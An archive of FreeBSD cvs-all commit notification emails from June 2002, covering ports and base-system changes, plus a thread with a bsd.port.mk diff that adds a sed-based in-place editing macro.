g5H6Ef342223; Sun, 16 Jun 2002 23:14:41 -0700 (PDT) (envelope-from jhay) Message-Id: <200206170614.g5H6Ef342223@freefall.freebsd.org> From: John Hay Date: Sun, 16 Jun 2002 23:14:41 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: src/sys/modules Makefile src/sys/modules/sppp Makefile X-FreeBSD-CVS-Branch: RELENG_4 Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG jhay 2002/06/16 23:14:41 PDT Modified files: (Branch: RELENG_4) sys/modules Makefile Added files: (Branch: RELENG_4) sys/modules/sppp Makefile Log: MFC: Make sppp a module. Revision Changes Path 1.110.2.51 +1 -0 src/sys/modules/Makefile 1.5.2.1 +27 -0 src/sys/modules/sppp/Makefile (new) To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Sun Jun 16 23:24:29 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 449EB37B432; Sun, 16 Jun 2002 23:24:24 -0700 (PDT) Received: (from dillon@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5H6ONE43276; Sun, 16 Jun 2002 23:24:23 -0700 (PDT) (envelope-from dillon) Message-Id: <200206170624.g5H6ONE43276@freefall.freebsd.org> From: Matt Dillon Date: Sun, 16 Jun 2002 23:24:23 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: ports/graphics Makefile ports/graphics/crw Makefile distinfo pkg-comment pkg-descr pkg-plist X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG dillon 2002/06/16 23:24:23 PDT Modified files: graphics Makefile Added files: graphics/crw Makefile distinfo pkg-comment pkg-descr pkg-plist Log: Initial checking of the 'crw' port. This program converts the RAW Canon digital camera format into something gimp or ImageMagick can process. The program was originally written by Dave Coffin , who gave me permission to make a port out of it. I've made extensive modifications to the program's algorithms. Revision Changes Path 1.458 +1 -0 ports/graphics/Makefile 1.1 +19 -0 ports/graphics/crw/Makefile (new) 1.1 +1 -0 ports/graphics/crw/distinfo (new) 1.1 +1 -0 ports/graphics/crw/pkg-comment (new) 1.1 +5 -0 ports/graphics/crw/pkg-descr (new) 1.1 +1 -0 ports/graphics/crw/pkg-plist (new) To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Sun Jun 16 23:24:30 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id AFB6B37B421; Sun, 16 Jun 2002 23:24:25 -0700 (PDT) Received: (from dillon@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5H6OPw43308; Sun, 16 Jun 2002 23:24:25 -0700 (PDT) (envelope-from dillon) Message-Id: <200206170624.g5H6OPw43308@freefall.freebsd.org> From: Matt Dillon Date: Sun, 16 Jun 2002 23:24:25 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: CVSROOT modules X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG dillon 2002/06/16 23:24:25 PDT Modified files: . modules Log: crw --> ports/graphics/crw Revision Changes Path 1.5369 +1 -0 CVSROOT/modules To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Sun Jun 16 23:43:46 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id B757937B403; Sun, 16 Jun 2002 23:43:43 -0700 (PDT) Received: (from lkoeller@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5H6hhB45040; Sun, 16 Jun 2002 23:43:43 -0700 (PDT) (envelope-from lkoeller) Message-Id: <200206170643.g5H6hhB45040@freefall.freebsd.org> From: Lars Koeller Date: Sun, 16 Jun 2002 23:43:43 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: ports/print/hp2xx Makefile distinfo pkg-comment ports/print/hp2xx/files patch-aa X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG lkoeller 2002/06/16 23:43:43 PDT Modified files: print/hp2xx Makefile distinfo pkg-comment print/hp2xx/files patch-aa Log: o Update to version 3.4.2 Revision Changes Path 1.11 +1 -2 ports/print/hp2xx/Makefile 1.3 +1 -1 ports/print/hp2xx/distinfo 1.5 +8 -37 ports/print/hp2xx/files/patch-aa 1.3 +1 -1 ports/print/hp2xx/pkg-comment To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Mon Jun 17 0:52:54 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 7279337B419; Mon, 17 Jun 2002 00:52:36 -0700 (PDT) Received: (from tobez@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5H7qa156050; Mon, 17 Jun 2002 00:52:36 -0700 (PDT) (envelope-from tobez) Message-Id: <200206170752.g5H7qa156050@freefall.freebsd.org> From: Anton Berezin Date: Mon, 17 Jun 2002 00:52:36 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: ports/net/ipfm Makefile distinfo pkg-descr pkg-plist ports/net/ipfm/files patch-aa patch-ab X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG tobez 2002/06/17 00:52:36 PDT Modified files: net/ipfm Makefile distinfo pkg-descr pkg-plist Removed files: net/ipfm/files patch-aa patch-ab Log: Update from 0.10.4 to 0.11.4 Install manpages correctly Various fixes PR: 39248 Submitted by: Alex Dupre Approved by: maintainer Revision Changes Path 1.5 +9 -5 ports/net/ipfm/Makefile 1.2 +1 -1 ports/net/ipfm/distinfo 1.2 +0 -11 ports/net/ipfm/files/patch-aa (dead) 1.2 +0 -11 ports/net/ipfm/files/patch-ab (dead) 1.2 +5 -3 ports/net/ipfm/pkg-descr 1.3 +1 -2 ports/net/ipfm/pkg-plist To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Mon Jun 17 0:58:51 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 8CED037B404; Mon, 17 Jun 2002 00:58:47 -0700 (PDT) Received: (from tobez@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5H7wl456477; Mon, 17 Jun 2002 00:58:47 -0700 (PDT) (envelope-from tobez) Message-Id: <200206170758.g5H7wl456477@freefall.freebsd.org> From: Anton Berezin Date: Mon, 17 Jun 2002 00:58:47 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: ports/devel/p5-Exception-Class Makefile distinfo pkg-descr X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG tobez 2002/06/17 00:58:47 PDT Modified files: devel/p5-Exception-Class Makefile distinfo pkg-descr Log: - update to 1.01 - assume maintainership - add WWW PR: 39399 Submitted by: Erwin Lansing Revision Changes Path 1.3 +5 -4 ports/devel/p5-Exception-Class/Makefile 1.2 +1 -1 ports/devel/p5-Exception-Class/distinfo 1.2 +2 -0 ports/devel/p5-Exception-Class/pkg-descr To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Mon Jun 17 1:19:57 2002 Delivered-To: cvs-all@freebsd.org Received: from rhadamanth.submonkey.net (pc1-card5-0-cust12.cdf.cable.ntl.com [80.3.216.12]) by hub.freebsd.org (Postfix) with ESMTP id 6E45537B408; Mon, 17 Jun 2002 01:19:52 -0700 (PDT) Received: from setantae by rhadamanth.submonkey.net with local (Exim 3.36 #1) id 17Jrjr-0001N0-00; Mon, 17 Jun 2002 09:19:51 +0100 Date: Mon, 17 Jun 2002 09:19:51 +0100 From: Ceri Davies To: blackend@FreeBSD.org Cc: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: Re: cvs commit: CVSROOT access Message-ID: <20020617081951.GC4907@submonkey.net> Mail-Followup-To: Ceri Davies , blackend@FreeBSD.org, cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org References: <200206162202.g5GM2WN57007@freefall.freebsd.org> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline In-Reply-To: <200206162202.g5GM2WN57007@freefall.freebsd.org> User-Agent: Mutt/1.5.1i Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG On Sun, Jun 16, 2002 at 03:02:32PM -0700, Nik Clayton wrote: > nik 2002/06/16 15:02:32 PDT > > Modified files: > . access > Log: > It is my great pleasure to welcome Marc Fonvieille (blackend) to the > funny farm, for services above and beyond the call of duty to the -doc PR > list. Marc will be mentored by Giorgos as he joins our happy family. About time too. Glad to have you onboard (and not hammering my mailbox with PRs), Marc. Cackle. Ceri -- you can't see when light's so strong you can't see when light is gone To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Mon Jun 17 1:22: 1 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 1733837B407; Mon, 17 Jun 2002 01:21:54 -0700 (PDT) Received: (from jkoshy@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5H8LsH63241; Mon, 17 Jun 2002 01:21:54 -0700 (PDT) (envelope-from jkoshy) Message-Id: <200206170821.g5H8LsH63241@freefall.freebsd.org> From: Joseph Koshy Date: Mon, 17 Jun 2002 01:21:53 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: ports/audio/snack Makefile distinfo pkg-plist X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG jkoshy 2002/06/17 01:21:53 PDT Modified files: audio/snack Makefile distinfo pkg-plist Log: Upgrade to v2.1.6. Make port respect ${PREFIX}. Add conditional support for OGG/VORBIS (make 'WITH_VORBIS=yes'). PR: ports/35476 Submitted by: David Yeske Revision Changes Path 1.3 +21 -2 ports/audio/snack/Makefile 1.2 +1 -1 ports/audio/snack/distinfo 1.2 +1 -0 ports/audio/snack/pkg-plist To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Mon Jun 17 1:22: 6 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 171BD37B426; Mon, 17 Jun 2002 01:21:54 -0700 (PDT) Received: (from sobomax@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5H8Ls863243; Mon, 17 Jun 2002 01:21:54 -0700 (PDT) (envelope-from sobomax) Message-Id: <200206170821.g5H8Ls863243@freefall.freebsd.org> From: Maxim Sobolev Date: Mon, 17 Jun 2002 01:21:53 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: src/usr.bin/sed Makefile X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG sobomax 2002/06/17 01:21:53 PDT Modified files: usr.bin/sed Makefile Log: Kill superfluous blank line. Revision Changes Path 1.5 +0 -1 src/usr.bin/sed/Makefile To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Mon Jun 17 1:46:17 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 1830037B413; Mon, 17 Jun 2002 01:46:12 -0700 (PDT) Received: (from sobomax@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5H8kCH66234; Mon, 17 Jun 2002 01:46:12 -0700 (PDT) (envelope-from sobomax) Message-Id: <200206170846.g5H8kCH66234@freefall.freebsd.org> From: Maxim Sobolev Date: Mon, 17 Jun 2002 01:46:12 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: ports/textproc Makefile ports/textproc/sed_inplace Makefile distinfo pkg-comment pkg-descr pkg-plist ports/textproc/sed_inplace/src Makefile compile.c defs.h extern.h main.c misc.c process.c X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG sobomax 2002/06/17 01:46:11 PDT Modified files: textproc Makefile Added files: textproc/sed_inplace Makefile distinfo pkg-comment pkg-descr pkg-plist textproc/sed_inplace/src Makefile compile.c defs.h extern.h main.c misc.c process.c Log: Add sed_inplace 2002.06.17, a modified version of the sed(1) which can do in-place editing of files. Revision Changes Path 1.376 +1 -0 ports/textproc/Makefile 1.1 +30 -0 ports/textproc/sed_inplace/Makefile (new) 1.1 +1 -0 ports/textproc/sed_inplace/distinfo (new) 1.1 +1 -0 ports/textproc/sed_inplace/pkg-comment (new) 1.1 +2 -0 ports/textproc/sed_inplace/pkg-descr (new) 1.1 +1 -0 ports/textproc/sed_inplace/pkg-plist (new) 1.1 +12 -0 ports/textproc/sed_inplace/src/Makefile (new) 1.1 +868 -0 ports/textproc/sed_inplace/src/compile.c (new) 1.1 +136 -0 ports/textproc/sed_inplace/src/defs.h (new) 1.1 +58 -0 ports/textproc/sed_inplace/src/extern.h (new) 1.1 +466 -0 ports/textproc/sed_inplace/src/main.c (new) 1.1 +76 -0 ports/textproc/sed_inplace/src/misc.c (new) 1.1 +646 -0 ports/textproc/sed_inplace/src/process.c (new) To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Mon Jun 17 1:46:39 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id EC46037B421; Mon, 17 Jun 2002 01:46:19 -0700 (PDT) Received: (from sobomax@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5H8kJr66274; Mon, 17 Jun 2002 01:46:19 -0700 (PDT) (envelope-from sobomax) Message-Id: <200206170846.g5H8kJr66274@freefall.freebsd.org> From: Maxim Sobolev Date: Mon, 17 Jun 2002 01:46:19 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: CVSROOT modules X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG sobomax 2002/06/17 01:46:19 PDT Modified files: . modules Log: sed_inplace --> ports/textproc/sed_inplace Revision Changes Path 1.5370 +1 -0 CVSROOT/modules To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Mon Jun 17 1:58:33 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id F376637B409; Mon, 17 Jun 2002 01:58:29 -0700 (PDT) Received: (from anholt@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5H8wTi67547; Mon, 17 Jun 2002 01:58:29 -0700 (PDT) (envelope-from anholt) Message-Id: <200206170858.g5H8wTi67547@freefall.freebsd.org> From: Eric Anholt Date: Mon, 17 Jun 2002 01:58:29 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: src MAINTAINERS X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG anholt 2002/06/17 01:58:29 PDT Modified files: . MAINTAINERS Log: Fill in my MAINTAINER info for drm Approved by: des Revision Changes Path 1.35 +1 -0 src/MAINTAINERS To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Mon Jun 17 2: 0:32 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id EB30137B411; Mon, 17 Jun 2002 02:00:21 -0700 (PDT) Received: (from tjr@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5H90LK67923; Mon, 17 Jun 2002 02:00:21 -0700 (PDT) (envelope-from tjr) Message-Id: <200206170900.g5H90LK67923@freefall.freebsd.org> From: "Tim J. Robbins" Date: Mon, 17 Jun 2002 02:00:21 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: src/usr.bin/env env.c src/usr.bin/printenv printenv.1 X-FreeBSD-CVS-Branch: RELENG_4 Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG tjr 2002/06/17 02:00:21 PDT Modified files: (Branch: RELENG_4) usr.bin/env env.c usr.bin/printenv printenv.1 Log: MFC: Fix env(1) exit status to conform with SUSv3 env.c rev. 1.6, 1.7, printenv.1 rev. 1.12 Revision Changes Path 1.5.2.2 +7 -3 src/usr.bin/env/env.c 1.6.2.8 +16 -7 src/usr.bin/printenv/printenv.1 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Mon Jun 17 2: 9:27 2002 Delivered-To: cvs-all@freebsd.org Received: from sdns.kv.ukrtel.net (sdns.kv.ukrtel.net [195.5.27.246]) by hub.freebsd.org (Postfix) with ESMTP id 1EDA037B40F; Mon, 17 Jun 2002 02:09:10 -0700 (PDT) Received: from vega.vega.com (195.5.51.243 [195.5.51.243]) by sdns.kv.ukrtel.net with SMTP (Microsoft Exchange Internet Mail Service Version 5.5.2650.21) id M7SJ6L8G; Mon, 17 Jun 2002 12:11:13 +0300 Received: from FreeBSD.org (big_brother.vega.com [192.168.1.1]) by vega.vega.com (8.11.6/8.11.3) with ESMTP id g5H993b22812; Mon, 17 Jun 2002 12:09:03 +0300 (EEST) (envelope-from sobomax@FreeBSD.org) Message-ID: <3D0DA76A.D3C6CE27@FreeBSD.org> Date: Mon, 17 Jun 2002 12:10:02 +0300 From: Maxim Sobolev Organization: Vega International Capital X-Mailer: Mozilla 4.79 [en] (Windows NT 5.0; U) X-Accept-Language: en,uk,ru MIME-Version: 1.0 To: Trevor Johnson , Juli Mallett , Pete Fritchman , portmgr@FreeBSD.ORG Cc: ports@FreeBSD.org Subject: Re: cvs commit: ports/Mk bsd.port.mk References: <20020614033017.I8221-100000@blues.jpj.net> <3D09DB11.8362727A@FreeBSD.org> Content-Type: multipart/mixed; boundary="------------3C3180A8375A26F21D7A7791" Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG This is a multi-part message in MIME format. --------------3C3180A8375A26F21D7A7791 Content-Type: text/plain; charset=koi8-r Content-Transfer-Encoding: 7bit Maxim Sobolev wrote: > > Trevor Johnson wrote: > > > > Juli Mallett wrote: > > > > > Anyway, it's on my list of things to MFC, but it was controversial when it was > > > on the tip of my mind, and I had trivial stuff I was having trouble getting to > > > the RELENG_4 branch during the freeze, so I decided I'd wait for the free for > > > all. I'd like to see ports move over to using it once it's been MFC'd for a > > > while... > > > > Suppose there were a port, call it ports/misc/46upgrade, which installed > > jmallett's sed, either as "jsed" or as just plain "sed" (in the latter > > case, it would /usr/bin/sed aside on installation, and back in place on > > deinstallation). Suppose the jsed port bumped /var/db/port.mkversion and > > bsd.port.mk checked for this ("your system is too old to use this > > bsd.port.mk") Then the macro for patching in situ could always use > > jmallett's sed, never perl. It would behave consistently across different > > versions of FreeBSD, so it would be easier to test and debug. > > I should admit that it looks like the most realistic plan out there. > The main problems are with $ and @ characters, which have a special > meaning for perl but no such meaning for sed(1), so that any, even > simple, regexp that uses those chars *could not* be modified to work > uniformly with both perl and sed. I've just added textproc/sed_inplace port, which is essentially sed(1) snapshot from FreeBSD cvs. Attached patch should allow to automagically use this port on systems which don't have sed capable of doing in-place editing, so that there will be no sed vs. perl regex nightmare. It also allows people to override sed(1) args to change extension of backup file or get rid of it completely. What do people think about it? May I commit it without doing the full bento build first? -Maxim --------------3C3180A8375A26F21D7A7791 Content-Type: text/plain; charset=koi8-r; name="bsd.port.mk.diff" Content-Transfer-Encoding: 7bit Content-Disposition: inline; filename="bsd.port.mk.diff" Index: bsd.port.mk =================================================================== RCS file: /home/ncvs/ports/Mk/bsd.port.mk,v retrieving revision 1.414 diff -d -u -r1.414 bsd.port.mk --- bsd.port.mk 13 Jun 2002 18:20:40 -0000 1.414 +++ bsd.port.mk 17 Jun 2002 09:06:22 -0000 @@ -623,13 +623,6 @@ .endif .endif -# Special macro for doing in-place file editing using regexps -.if ${OSVERSION} <= 500033 -REINPLACE_CMD?= ${PERL} -p -i.bak -.else -REINPLACE_CMD?= ${SED} -i.bak -.endif - # Get the object format. .if !defined(PORTOBJFORMAT) PORTOBJFORMAT!= test -x /usr/bin/objformat && /usr/bin/objformat || echo aout @@ -716,6 +709,17 @@ SCRIPTDIR?= ${MASTERDIR}/scripts PKGDIR?= ${MASTERDIR} +# Special macro for doing in-place file editing using regexps +.if defined(USE_REINPLACE) +REINPLACE_ARGS?= -i.bak +.if ${OSVERSION} <= 500033 +BUILD_DEPENDS+= ${LOCALBASE}/bin/sed_inplace:${PORTSDIR}/textproc/sed_inplace +REINPLACE_CMD?= ${LOCALBASE}/bin/sed_inplace ${REINPLACE_ARGS} +.else +REINPLACE_CMD?= ${SED} ${REINPLACE_ARGS} +.endif +.endif + .if defined(USE_IMAKE) && !defined(USE_X_PREFIX) USE_X_PREFIX= yes .endif --------------3C3180A8375A26F21D7A7791-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Mon Jun 17 2:39:33 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id BED9C37B415; Mon, 17 Jun 2002 02:39:30 -0700 (PDT) Received: (from alfred@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5H9dUs76095; Mon, 17 Jun 2002 02:39:30 -0700 (PDT) (envelope-from alfred) Message-Id: <200206170939.g5H9dUs76095@freefall.freebsd.org> From: Alfred Perlstein Date: Mon, 17 Jun 2002 02:39:30 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: src/sys/sys file.h X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG alfred 2002/06/17 02:39:30 PDT Modified files: sys/sys file.h Log: remove bogus comment, select/poll do NOT need to fhold as they hold the filedesc lock. style(9) fixes, add blank line at start of functions with no local variables. Revision Changes Path 1.45 +4 -1 src/sys/sys/file.h To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Mon Jun 17 3:15:37 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id F351137B40C; Mon, 17 Jun 2002 03:15:34 -0700 (PDT) Received: (from sobomax@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5HAFYi83834; Mon, 17 Jun 2002 03:15:34 -0700 (PDT) (envelope-from sobomax) Message-Id: <200206171015.g5HAFYi83834@freefall.freebsd.org> From: Maxim Sobolev Date: Mon, 17 Jun 2002 03:15:34 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: ports/devel/glib20 Makefile ports/devel/glib20/files patch-gmodule-2.0.pc.in X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG sobomax 2002/06/17 03:15:33 PDT Modified files: devel/glib20 Makefile Added files: devel/glib20/files patch-gmodule-2.0.pc.in Log: Don't leak --export-dynamic into installed gmodule-2.0.pc. Revision Changes Path 1.68 +2 -2 ports/devel/glib20/Makefile 1.1 +12 -0 ports/devel/glib20/files/patch-gmodule-2.0.pc.in (new) To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Mon Jun 17 3:54:23 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id DDD2637B404; Mon, 17 Jun 2002 03:54:20 -0700 (PDT) Received: (from jmallett@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5HAsKd87807; Mon, 17 Jun 2002 03:54:20 -0700 (PDT) (envelope-from jmallett) Message-Id: <200206171054.g5HAsKd87807@freefall.freebsd.org> From: Juli Mallett Date: Mon, 17 Jun 2002 03:54:20 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: projects README X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG jmallett 2002/06/17 03:54:20 PDT Modified files: . README Log: Mark the repo-surgery of SCCS into the projects/ area, which I will take full responsibility for. Revision Changes Path 1.6 +1 -0 projects/README To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Mon Jun 17 4: 4:25 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 121A037B400; Mon, 17 Jun 2002 04:04:23 -0700 (PDT) Received: (from tjr@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5HB4MJ92385; Mon, 17 Jun 2002 04:04:22 -0700 (PDT) (envelope-from tjr) Message-Id: <200206171104.g5HB4MJ92385@freefall.freebsd.org> From: "Tim J. Robbins" Date: Mon, 17 Jun 2002 04:04:22 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: src/bin/pwd pwd.1 pwd.c X-FreeBSD-CVS-Branch: RELENG_4 Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG tjr 2002/06/17 04:04:22 PDT Modified files: (Branch: RELENG_4) bin/pwd pwd.1 pwd.c Log: MFC: SUSv3 pwd(1) -L option, mdoc fixes pwd.c 1.15-1.16 1.18-1.19, pwd.1 1.16-1.20 Revision Changes Path 1.10.2.5 +33 -10 src/bin/pwd/pwd.1 1.9.2.3 +62 -28 src/bin/pwd/pwd.c To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Mon Jun 17 4:21:22 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 369CE37B407; Mon, 17 Jun 2002 04:21:19 -0700 (PDT) Received: (from sobomax@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5HBLJB98164; Mon, 17 Jun 2002 04:21:19 -0700 (PDT) (envelope-from sobomax) Message-Id: <200206171121.g5HBLJB98164@freefall.freebsd.org> From: Maxim Sobolev Date: 